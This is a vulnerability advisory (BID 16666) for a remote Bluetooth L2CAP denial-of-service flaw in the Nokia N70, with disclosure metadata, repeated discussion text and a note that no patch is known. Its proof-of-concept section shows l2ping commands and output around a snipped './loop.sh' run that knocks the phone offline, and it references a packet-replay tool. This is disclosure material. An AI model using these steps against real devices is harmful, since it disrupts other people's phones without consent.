Nokia N70 L2CAP Packets Remote Denial of Service Vulnerability
BID:16666
Info
Nokia N70 L2CAP Packets Remote Denial of Service Vulnerability
| Bugtraq ID: | 16666 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 15 2006 12:00AM |
| Updated: | Feb 15 2006 10:12PM |
| Credit: | Discovered by Pierre Betouin <[email protected]> using Bluetooh Stack Smasher (BSS). |
| Vulnerable: |
Nokia N70 0 |
| Not Vulnerable: | |
Discussion
Nokia N70 L2CAP Packets Remote Denial of Service Vulnerability
Nokia N70 is reportedly prone to a remote denial-of-service vulnerability.
A successful attack can allow an attacker to corrupt memory and to trigger a denial-of-service condition. Arbitrary code execution may be possible as well, but this has not been confirmed.
Nokia model N70 is reported vulnerable to this issue; the specific firmware is currently unknown.
This issue is reported to be a seperate issue than 16513 (Nokia N70 Remote Denial of Service Vulnerability) also discovered using the BSS Stack Smasher.
Nokia N70 is reportedly prone to a remote denial-of-service vulnerability.
A successful attack can allow an attacker to corrupt memory and to trigger a denial-of-service condition. Arbitrary code execution may be possible as well, but this has not been confirmed.
Nokia model N70 is reported vulnerable to this issue; the specific firmware is currently unknown.
This issue is reported to be a seperate issue than 16513 (Nokia N70 Remote Denial of Service Vulnerability) also discovered using the BSS Stack Smasher.
Exploit / POC
Nokia N70 L2CAP Packets Remote Denial of Service Vulnerability
The BSS - Bluetooth Stack Smasher is reported to be able to trigger this vulnerability.
The following proof of concept is available:
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss
# ./loop.sh 00:15:A0:XX:XX:XX
(.. snip ..)
# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:15:A0:XX:XX:XX id 0
1 sent, 0 received, 100% loss
The BSS - Bluetooth Stack Smasher is reported to be able to trigger this vulnerability.
The following proof of concept is available:
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss
# ./loop.sh 00:15:A0:XX:XX:XX
(.. snip ..)
# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:15:A0:XX:XX:XX id 0
1 sent, 0 received, 100% loss
Solution / Fix
Nokia N70 L2CAP Packets Remote Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
References
Nokia N70 L2CAP Packets Remote Denial of Service Vulnerability
References:
References:
- [Infratech - vulnérabilité] Un Deuxième type de Déni de Service sur NOKIA N70 (Pierre Betouin)
- Nokia Nseries (Nokia)
- replay_l2cap_packet_nokiaN70.c (Pierre BETOUIN)